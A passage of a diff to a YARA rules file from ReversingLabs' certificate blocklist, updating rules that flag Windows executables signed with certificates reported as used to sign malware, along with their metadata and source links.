condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "MIDDRA INTERNATIONAL CORP." and (pe.signatures[i].serial=="00:a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c" or pe.signatures[i].serial=="a9:18:45:5c:0d:4d:a7:ca:47:4f:41:f1:1a:7c:f3:8c") and 1618963200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Inter Med Pty. Ltd." and pe.signatures[i].serial=="39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" and 1583539200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_1362E56D34Dc7B501E17Fa1Ac3C3E3D9 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4dbe7db7-2f61-558c-a6dc-875ba87322c7" + id = "9dccd009-eca1-5f21-b5ef-1a75f9d93c7d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9572-L9590" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7e90c29bcfe4632e70b61a0cf2ab48a3de986bd5c6c730f64a363f4f3d79a3f4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3580-L3596" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0415c5a49076bab23dfc29ef2d6168b93d6bfde07a89ccb0368d2c967422407a" score = 75 quality = 90 tags = "INFO, FILE" @@ -13612,22 +33403,22 @@ rule REVERSINGLABS_Cert_Blocklist_936Bc256D2057Ca9B9Ec3034C3Ed0Ee6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SALES & MAINTENANCE LIMITED" and (pe.signatures[i].serial=="00:93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6" or pe.signatures[i].serial=="93:6b:c2:56:d2:05:7c:a9:b9:ec:30:34:c3:ed:0e:e6") and 1616889600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO \"Amaranth\"" and pe.signatures[i].serial=="13:62:e5:6d:34:dc:7b:50:1e:17:fa:1a:c3:c3:e3:d9" and 1575936000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_4B83593Fc78D92Cfaa9Bdf3F97383964 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "83d08ca6-2a0b-5da3-8d53-7bf8bcc361cf" + id = "8b5a8a8e-16f5-5098-83e5-72820f4f548a" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9592-L9610" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "02c55b182bc9843334baed9c0a7cca2c88cd1de00ca9b47b10ec79b7a5acf9bb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3598-L3614" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "775e41fc102cbaeb9374984380b0e073de2a0075b9a200f8ab644bd1369ba015" score = 75 quality = 90 tags = "INFO, FILE" @@ -13637,22 +33428,22 @@ rule REVERSINGLABS_Cert_Blocklist_Afe8Fee94B41422E01E4897Bcd52D0A4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TLGM ApS" and (pe.signatures[i].serial=="00:af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4" or pe.signatures[i].serial=="af:e8:fe:e9:4b:41:42:2e:01:e4:89:7b:cd:52:d0:a4") and 1617062400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Kometa" and pe.signatures[i].serial=="4b:83:59:3f:c7:8d:92:cf:aa:9b:df:3f:97:38:39:64" and 1579996800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C7505E7464E00Ec1Dccd8D1B466D15Ff : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "d173c2b2-2b76-521a-aac1-ae69fdf5b16b" + id = "a75cc09f-de73-5db4-9ace-189e8da99053" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9612-L9628" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2f0defa1e1d905d937677e96f2a0955d9737f6976596932cc093fdecfea3fdb0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3616-L3634" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "7c5c84cb9071eff6a1bd7062506b807466bb4a432d1ed073961898c6c08cc4bd" score = 75 quality = 90 tags = "INFO, FILE" @@ -13662,22 +33453,22 @@ rule REVERSINGLABS_Cert_Blocklist_718E89Ddb33257Ea77Ba74Be7F2Baf1D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Trap Capital ApS" and pe.signatures[i].serial=="71:8e:89:dd:b3:32:57:ea:77:ba:74:be:7f:2b:af:1d" and 1635462927<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ltd. \"Eve Beauty\"" and (pe.signatures[i].serial=="00:c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff" or pe.signatures[i].serial=="c7:50:5e:74:64:e0:0e:c1:dc:cd:8d:1b:46:6d:15:ff") and 1583824676<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Cbf91988Fb83511De1B3A7A520712E9C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "173f89ca-e7b3-507b-96c1-325dd06210f8" + id = "d2d71058-f7b9-594f-b099-75aa4774306f" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9630-L9646" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f618547942fcd9b3d1104cb5bedeecec8596fa7cc34bca838b6120085b305d73" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3636-L3654" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5862a8ec43d2e545f36b815ada2bb31c4384a8161c6956a31f3bd517532923fd" score = 75 quality = 90 tags = "INFO, FILE" @@ -13687,22 +33478,22 @@ rule REVERSINGLABS_Cert_Blocklist_4D3E38F4Aebbc32257450726B29Be117 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "POLE & AERIAL FITNESS LIMITED" and pe.signatures[i].serial=="4d:3e:38:f4:ae:bb:c3:22:57:45:07:26:b2:9b:e1:17" and 1636123882<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Ltd. \"Eve Beauty\"" and (pe.signatures[i].serial=="00:cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c" or pe.signatures[i].serial=="cb:f9:19:88:fb:83:51:1d:e1:b3:a7:a5:20:71:2e:9c") and 1578786662<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_Ce3675Ae4Abfe688870Bcacb63060F4F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "b7731056-1674-5375-a3cb-69632670d6d9" + id = "586c9de9-e1b0-5d17-9783-c9e18dfdf463" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9648-L9666" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a8c99cc30b791a76fe3cd48184bf95ee47abb30bd200128efd2f5295ee18f7b1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3656-L3674" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0c6f2ef55bef283a3f915fd8c1ced27c3c665f7f490caeea0f180c2d7fa2b2b5" score = 75 quality = 90 tags = "INFO, FILE" @@ -13712,22 +33503,22 @@ rule REVERSINGLABS_Cert_Blocklist_8F4C49Dae1F1Ff0Ebe9104C6F73242Bd : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Contact Merger Holding ApS" and (pe.signatures[i].serial=="00:8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd" or pe.signatures[i].serial=="8f:4c:49:da:e1:f1:ff:0e:be:91:04:c6:f7:32:42:bd") and 1636039748<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO \"MPS\"" and (pe.signatures[i].serial=="00:ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f" or pe.signatures[i].serial=="ce:36:75:ae:4a:bf:e6:88:87:0b:ca:cb:63:06:0f:4f") and 1582675200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9813229Efe0046D23542Cc7569D5A403 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2578655e-6420-5a67-9116-cab5cf5bc195" + id = "0cf7573f-290d-58ac-989f-f82e9313d54e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9668-L9686" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6328fd5dbb497c69ddc9151f85754669760b709ecbff3e8f320a40a62ca0dd2c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3676-L3694" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0d8f0df83572b8d31f29cb76f44d524fd1ae0467d2d99af959e45694524d18e8" score = 75 quality = 90 tags = "INFO, FILE" @@ -13737,22 +33528,22 @@ rule REVERSINGLABS_Cert_Blocklist_Ac3C05F1Cb9453De8E7110F589Fb32C0 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRAIN BUILDING TEAM s.r.o." and (pe.signatures[i].serial=="00:ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0" or pe.signatures[i].serial=="ac:3c:05:f1:cb:94:53:de:8e:71:10:f5:89:fb:32:c0") and 1635854205<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO \"MPS\"" and (pe.signatures[i].serial=="00:98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" or pe.signatures[i].serial=="98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03") and 1575849600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_86E5A9B9E89E5075C475006D0Ca03832 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "77319b9c-6075-5ac7-958c-d76916873e85" + id = "f3058f56-dcbb-532a-b914-5ac0e6d70e6e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9688-L9706" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "431e3364a42b272d9b71b92dee44cc185ef034a45a0b72bbda82cf7e9b29c355" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3696-L3714" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "5ba0b0f1b104eb11023590b8ef2b9cc747372bc9310a754694d45d3b3ce293e9" score = 75 quality = 90 tags = "INFO, FILE" @@ -13762,22 +33553,22 @@ rule REVERSINGLABS_Cert_Blocklist_Fbb96A90B6718810311767Ca25Ab1E48 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rakurs LLC" and (pe.signatures[i].serial=="00:fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48" or pe.signatures[i].serial=="fb:b9:6a:90:b6:71:88:10:31:17:67:ca:25:ab:1e:48") and 1636046757<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BlueMarble GmbH" and (pe.signatures[i].serial=="00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" or pe.signatures[i].serial=="86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32") and 1574791194<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_075Dca9Ca84B93E8A89B775128F90302 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "f53e4f44-dde2-5f7a-8cab-71e91ff75d28" + id = "2fa6b400-7c6c-5bc4-9cac-78d52003a24e" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9708-L9726" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a2f67cbf31c9db2891892c31a7ed4ce7eccd834bfb10ae70f58e46f8e68e7c17" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3716-L3732" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "32af21e71fb3475c50de4cd8a24fa0aec1ee67bc01c1a3720c12f9ce822833c3" score = 75 quality = 90 tags = "INFO, FILE" @@ -13787,22 +33578,22 @@ rule REVERSINGLABS_Cert_Blocklist_Cfd38423Aef875A10B16644D058297E2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TRUST DANMARK ApS" and (pe.signatures[i].serial=="00:cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2" or pe.signatures[i].serial=="cf:d3:84:23:ae:f8:75:a1:0b:16:64:4d:05:82:97:e2") and 1632884040<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "UAB GT-servis" and pe.signatures[i].serial=="07:5d:ca:9c:a8:4b:93:e8:a8:9b:77:51:28:f9:03:02" and 1579305601<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "2b5b79d8-e8fa-5593-b4c4-89af1f711152" + id = "9de11ec8-f408-593c-895f-08dff703ff10" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9728-L9746" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "bea8fea49144abc109e33a5964bb8e113aa61b4cd70c72a43183cb0840429571" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3734-L3750" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "622e6ed08ca26908539519f37cf493f8030100bd5e88cb05e851b7d56b0f4c0d" score = 75 quality = 90 tags = "INFO, FILE" @@ -13812,22 +33603,22 @@ rule REVERSINGLABS_Cert_Blocklist_E6C05C5A2222Bf92818324A3A7374Ad3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ANAQA EVENTS LTD" and (pe.signatures[i].serial=="00:e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3" or pe.signatures[i].serial=="e6:c0:5c:5a:22:22:bf:92:81:83:24:a3:a7:37:4a:d3") and 1634720407<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures[i].serial=="0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" and 1580722435<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_9Bd614D5869Bb66C96B67E154D517384 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e8e2d3b6-077f-56ba-9f2a-1941bf2ebdeb" + id = "eb42b516-aac6-5bee-af1d-70e0e66700f5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9748-L9764" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8ba66ab55f9a6755e11a7f39152aa26917271c7f6bc5ffdb42d07ad791fb47d7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3752-L3770" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d9eea38a1340797cef129b12cf2bb46c444e6f312db7356260f0ac0d9e63183d" score = 75 quality = 90 tags = "INFO, FILE" @@ -13837,22 +33628,22 @@ rule REVERSINGLABS_Cert_Blocklist_75Ce08Bdbad44123299Dbe9D7C1D20De : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Rose Holm International ApS" and pe.signatures[i].serial=="75:ce:08:bd:ba:d4:41:23:29:9d:be:9d:7c:1d:20:de" and 1631007095<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\"CENTR MBP\"" and (pe.signatures[i].serial=="00:9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" or pe.signatures[i].serial=="9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84") and 1581618180<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_540Cea639D5D48669B7F2F64 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7f98e550-fca6-564f-bbad-40e153f17adc" + id = "bfc514b6-43ef-5343-b5f2-d39168ba3e8d" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9766-L9782" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "30eeec467b837f6b1759cd0fd6a8bc2e8942f2400df170c671287f4159652479" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3772-L3788" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3d3774f10ff9949ea13a7892662438b84b3eb895fc986092649fa9b192170d48" score = 75 quality = 90 tags = "INFO, FILE" @@ -13862,22 +33653,22 @@ rule REVERSINGLABS_Cert_Blocklist_333705C20B56E57F60B5Eb191Eef0D90 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "TASK Holding ApS" and pe.signatures[i].serial=="33:37:05:c2:0b:56:e5:7f:60:b5:eb:19:1e:ef:0d:90" and 1634233052<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "CENTR MBP LLC" and pe.signatures[i].serial=="54:0c:ea:63:9d:5d:48:66:9b:7f:2f:64" and 1570871755<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_03A7748A4355020A652466B5E02E07De : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ab0c7b78-5e7e-5cb9-ae61-d88f3f8d9684" + id = "10134543-04fa-5a2f-8f77-98444ad1d7f0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9784-L9802" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f5e3c16f6caaf5f3152d90dc48895d0bbcdb296c368beeebb96157f03a8ded40" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3790-L3806" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6dc6d0fd2b702939847981ff31c2d8103227ccd0c19f999849ff89c64a90f92f" score = 75 quality = 90 tags = "INFO, FILE" @@ -13887,22 +33678,22 @@ rule REVERSINGLABS_Cert_Blocklist_A2A0Ba281262Acce7A00119E25564386 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Sopiteks LLC" and (pe.signatures[i].serial=="00:a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86" or pe.signatures[i].serial=="a2:a0:ba:28:12:62:ac:ce:7a:00:11:9e:25:56:43:86") and 1631908320<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Teleneras MB" and pe.signatures[i].serial=="03:a7:74:8a:43:55:02:0a:65:24:66:b5:e0:2e:07:de" and 1575244801<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_B881A72D4117Bbc38B81D3C65C792C1A : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ce30ace6-c2c2-5f3e-a2f7-1f08825d44eb" + id = "593c1799-a5df-5b3e-8a8b-826d808a14f0" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L9804-L9820" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7d7dd55eaab15cf458e5e57f0e5fbebdcc9313aee05394310a5cf9d9b4def153" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L3808-L3826" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "bad2a06090f077ebc635d21446b47c9f115fe477567afb3d5994043f5a7883b1" score = 75 quality = 90 tags = "INFO, FILE" @@ -13912,22 +33703,22 @@ rule REVERSINGLABS_Cert_Blocklist_338483Cc174C16Ebc454A3803Ffd4217 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Lpr:n Laatu-Ravintolat Oy" and pe.signatures[i].serial=="33:84:83:cc:17:4c:16:eb:c4:54:a3:80:3f:fd:42:17" and 1635208206<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Red GmbH" and (pe.signatures[i].serial=="00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures[i].serial=="b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a") and 1581936420<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Be89936C26Cd0D845074F6B7B47F480C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : INFO FILE { meta: description = "Certificate used 